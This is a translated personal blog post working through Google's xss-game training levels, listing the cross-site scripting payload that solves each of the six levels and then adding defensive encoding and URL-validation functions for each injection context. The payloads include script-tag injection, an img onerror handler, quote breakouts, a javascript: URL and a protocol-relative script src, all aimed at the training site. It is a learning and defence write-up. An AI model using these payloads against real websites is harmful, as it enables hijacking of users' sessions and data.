コンニチハレバレトシタアオゾラ

Whiling away the idle hours, from morning till night, in front of my blog, writing down without rhyme or reason whatever trifling things drift through my mind...

Trying out xss-game

What is xss-game?

https://xss-game.appspot.com/

Welcome, recruit! Cross-site scripting (XSS) bugs are one of the most common and dangerous types of vulnerabilities in Web applications. These nasty buggers can allow your enemies to steal or modify user data in your apps and you must learn to dispatch them, pronto!

At Google, we know very well how important these bugs are. In fact, Google is so serious about finding and fixing XSS issues that we are paying mercenaries up to $7,500 for dangerous XSS bugs discovered in our most sensitive products.

In this training program, you will learn to find and exploit XSS bugs. You'll use this knowledge to confuse and infuriate your adversaries by preventing such bugs from happening in your applications.

There will be cake at the end of the test.

A training program for XSS.

Trying it out

Level 1: Hello, world of XSS

https://xss-game.appspot.com/level1
<h1>xss</h1>

https://xss-game.appspot.com/level1/frame?query=<h1>xss</h1>
<script>alert("xss")</script>

https://xss-game.appspot.com/level1/frame?query=<script>alert("xss")</script>

Level 2: Persistence is key

https://xss-game.appspot.com/level2
<img src="xss" onerror=alert("xss")>

Level 3: That sinking feeling...

https://xss-game.appspot.com/level3
'/><script>alert("xss")</script>

https://xss-game.appspot.com/level3/frame#1'/><script>alert("xss")</script>

Level 4: Context matters

https://xss-game.appspot.com/level4
3');alert("xss")('

Level 5: Breaking protocol

https://xss-game.appspot.com/level5
javascript:alert("xss")

Level 6: Follow the 🐇

//google.com/jsapi?callback=alert

https://xss-game.appspot.com/level6/frame#//google.com/jsapi?callback=alert
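Each of the six payloads above works because user data is dropped into a different output context with no encoding or validation for that context. As an added example (my own code, not the original post's and not xss-game's source), here is one defensive routine per context, so the payloads from the levels can be checked against them; which context I assign to each level is my reading of the level, not the game's own implementation.

```javascript
// Added example, not code from the original post or from xss-game: one
// output-encoding or validation routine for each injection context the six
// levels exercise, so the post's own payloads can be checked against them.
// The context assigned to each level is my reading of the level, not the
// game's own source.

// Levels 1-2: data lands in the HTML body. Escape every HTML metacharacter.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;',
                '"': '&quot;', "'": '&#39;', '/': '&#x2F;' };
  return String(s).replace(/[&<>"'\/]/g, (c) => map[c]);
}

// Level 3: data lands inside an attribute value built from the URL fragment.
// Always quote the value and escape it; escapeHtml covers both quote kinds,
// so a stray ' or /> in the data cannot close the attribute or the tag.
function attr(name, value) {
  return `${name}="${escapeHtml(value)}"`;
}

// Level 4: data lands inside a JavaScript string literal. Encode anything that
// could close the literal, the call, or the enclosing <script> element.
function escapeJsString(s) {
  return String(s).replace(/[^0-9A-Za-z ]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Level 5: data becomes a link target. Only http(s) or a relative path passes;
// control characters are dropped first because browsers ignore them in a
// scheme, so "java\tscript:" is classified the same as "javascript:".
function isSafeUrl(u) {
  const t = String(u).replace(/[\x00-\x20]/g, '');
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(t);
  return !m || ['http', 'https'].includes(m[1].toLowerCase());
}

// Level 6: data becomes a <script src>. A protocol-relative "//host/..." is a
// foreign origin even though it carries no "http" prefix, so accept only a
// same-origin absolute path rather than blocklisting schemes.
function isSafeScriptSrc(u) {
  return /^\/(?![\/\\])/.test(String(u));
}
```

Note that for level 6 validating the callback name alone would not help: `alert` is a perfectly valid identifier, so the control has to be on where the script is loaded from.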

done
